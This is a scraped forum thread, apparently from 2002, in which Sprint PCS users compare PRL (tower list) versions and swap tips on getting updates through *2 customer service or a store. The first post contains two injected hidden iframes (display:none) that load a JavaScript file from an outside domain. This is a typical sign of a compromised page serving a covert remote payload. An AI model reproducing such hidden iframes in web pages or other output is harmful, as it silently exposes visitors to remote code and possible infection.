+ Reply to Thread

Thread: Tower Update

Tower Update

Does anyone know how to update the tower list on the phone. I know that my phone is using version 10012 and the current tower list is 10016.

My father took his phone to a sprint store, and they updated the tower list there, buy I am over an hour away from the closest Sprint Store.

I thought I read somewhere where you can change the tower version without going to the store... Anyone know anything about this? Any help would be greatly appreciated.

Thanks!

Russ<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

you could call tech support via *2 and tell them you hare having signal issues.. they CAN do it over the phone... it has been done before...

Just called the first customer rep... she said to just tell Clair - PRL Update, and it will be automatically done....

Tried this with clair and she just forwarded me to a customer service rep, who says it is not possible to update the tower list, without the account being "flagged" for update.

After a lenghty conversation with him... he is now checking on that and will find out if it is possible... I am now on hold..!

I will let everyone know what information I find.

Thanks for the help.

Russ

Well, He just said is was not possible for him to make the change, but a technical guy may be able to...

I think I am going to quit and go to the Sprint Store.

hmmm, just don't know about the spcs reps...first i went to the sprint store to update the tower list and they told me they didn't have the cable for the i300- wow, that's GREAT customer service and support. then at home, tried to update by pressing *2 and then telling claire, "prl update" - but it sent me back to customer service. this rep said to say to claire "prl" only, not "prl update". However, their computers are down for the next two hours so i can't do it now anyway. the rep also said supposedly that there was a lot of misinfo out there and that the prl was only good for the roaming towers, not the digital network. is he right?
    Last edited by davy; 01-14-2002 at 05:38 PM.

Administrator

Arrow

PRL is the Preferred Roaming List and it updates the list in the phone so it knows which towers it can use, and also if there is a new tower added into the users home area.

i didnt think claire would know how to do this as whe i had it done it was well before claire was born... i dont think she is that smart! :p

Re: Tower Update

Originally posted by russdog
    Does anyone know how to update the tower list on the phone. I know that my phone is using version 10012 and the current tower list is 10016.

Hi Russ:
    I am wondering where you got the info that 10016 is the latest PRL list for the phone. I just got off the phone with Sprint (actually talked to someone who had a clue) and she said the PRL I have 10013 is the latest and greatest? Does anyone actually have a PRL greater than 10013?

Just curious.
    Carl

I have 10013 as well.

Father in law took his Samsung 8500 to the Sprint store by us this weekend.. and his version is the 10016.

At least that is the update for that phone... I am only guessing that it can be used on our phones.

I have 10014 - I called customer support for a different reason and the guy said that I was in line for an update and to call back.. called back, and it was automatic.
    -mark

I have version 13.

I too have updated the phone via *2, just not this one (it was a startac if i remember correctly). It worked fine. The reps who say it is not possible, and then forward you to someone who says it is possible are just silly. its common to be told one thing by one rep and then a totally different thing by another rep with SprintPCS. The best way to inform yourself is to visit boards such as this, then you will know the truth!